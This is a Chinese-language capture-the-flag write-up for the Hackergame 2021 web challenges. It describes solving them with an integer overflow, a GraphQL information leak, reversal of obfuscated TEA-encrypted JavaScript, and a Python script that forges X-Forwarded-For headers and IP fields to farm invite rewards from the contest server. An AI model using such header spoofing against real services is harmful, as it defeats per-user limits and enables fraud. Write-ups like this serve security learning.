HackGame 2021 WEB WP
头一次参加 Hackergame 题目质量高,基本不会做,下次还敢。
只有五道web题,前面四道基本直接做出来,mineCraft写了半天反函数,最后百度到了~~(痛苦面具~~
签到
看起来好像是要计算时间戳,执行命令date +%s得到页数,GET传参得到flag。
卖瓜
一开始以为是条件竞争,测试一番无果。烦躁之下打了一串1,发现溢出变成负数了。(啊这。。)
9 1E19
9 1.024819115E18
9 206086200
9 1
9 1E19
9 1.024819115E18
9 206086200
9 1
9 2
FLAG 助力大红包
指名道姓了属实是抓包发现前端认证是POST请求中的ip,后端认证可以用XFF伪造。
题目限制1s一包。
import requests
import time
def r(i):
header = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36",
"X-Forwarded-For":str(i)+".1.1.1"
}
data = "ip="+str(i)+".1.1.1"
rr = requests.post('http://202.38.93.111:10888/invite/859350df-fe78-4448-9263-b1c79f0a777b',data=data,headers=header)
if "成功" in rr.text:
pass
else:
print(i)
for i in range(10,256):
r(i)
time.sleep(1)
图之上的信息
题目提示GraphQL,搜索一下发现有信息泄漏漏洞,照着写:
按照格式替换一下子段,得到flag
mineCraft
骗舍友说这是网页版MC,结果被打了一顿。
发现目录下存在/misc/flag.js,对这个混淆过的js分析:
const _0x22517d = _0x2c9e;
(function(_0x2018e5, _0xd122c5) {
const _0x4a600d = _0x2c9e,
_0x2e34d2 = _0x2018e5();
while (!![]) {
try {
const _0x4d38c4 = -parseInt(_0x4a600d(0x1b1)) / 0x1 * (parseInt(_0x4a600d(0x1ad)) / 0x2) + -parseInt(_0x4a600d(0x1b2)) / 0x3 * (parseInt(_0x4a600d(0x1b6)) / 0x4) + -parseInt(_0x4a600d(0x1ae)) / 0x5 * (-parseInt(_0x4a600d(0x1b4)) / 0x6) + parseInt(_0x4a600d(0x1ab)) / 0x7 * (parseInt(_0x4a600d(0x1af)) / 0x8) + parseInt(_0x4a600d(0x1b5)) / 0x9 + -parseInt(_0x4a600d(0x1b3)) / 0xa + -parseInt(_0x4a600d(0x1a9)) / 0xb * (-parseInt(_0x4a600d(0x1a7)) / 0xc);
if (_0x4d38c4 === _0xd122c5)
break;
else
_0x2e34d2['push'](_0x2e34d2['shift']());
} catch (_0x416145) {
_0x2e34d2['push'](_0x2e34d2['shift']());
}
}
}(_0x381b, 0x21c08),
String['prototype']["encrypt"] = function(_0x6a2659) {
_0x6a2659 = "1356853149054377"
const array1 = new Array(2),
array2 = new Array(4);
let encrypted_text = '';
plaintext = escape(this);
// console.log("plaintext = " + plaintext)
for (var i = 0; i < 4; i++)
array2[i] = Str4ToLong(_0x6a2659["slice"](i * 4, (i + 1) * 4));
// array2 = [909456177, 825439544, 892352820, 926364468]
// console.log(array2)
for (i = 0; i < plaintext["length"]; i += 8) {
array1[0] = Str4ToLong(plaintext['slice'](i, i + 4)),
array1[1] = Str4ToLong(plaintext["slice"](i + 4, i + 8)),
// console.log("1")
// console.log(array1)
// console.log(code(array1, array2));
code(array1, [909456177, 825439544, 892352820, 926364468]),
// console.log("2")
// console.log(array1[0])
// console.log(LongToBase16(array1[0]))
// console.log(LongToBase16(array1[0]) + LongToBase16(array1[1]))
// ========================== flag =============================
// = array1[0] array1[1] =
// = 1874716276 -2120590913 =
// = -1591700906 1531749031 =
// = -1591884176 -965187555 =
// = -1354040473 79179532 =
// ========================== flag =============================
encrypted_text += LongToBase16(array1[0]) + LongToBase16(array1[1]);
}
return encrypted_text;
});
function decode(array1,array2) {
// console.log("raw")
// console.log(array1)
let return_a = array1[0],
return_b = array1[1];
let i = 84941944608;
// console.log(return_a)
while (i != 0) {
return_b -= (return_a << 4 ^ return_a >>> 5) + return_a ^ i + array2[i >>> 11 & 3],
i -= 2654435769,
return_a -= (return_b << 4 ^ return_b >>> 5) + return_b ^ i + array2[i & 3];
}
array1[0] = return_a,
array1[1] = return_b;
console.log(array1)
}
写反函数写了快一天,然后百度tea发现有现成的。。。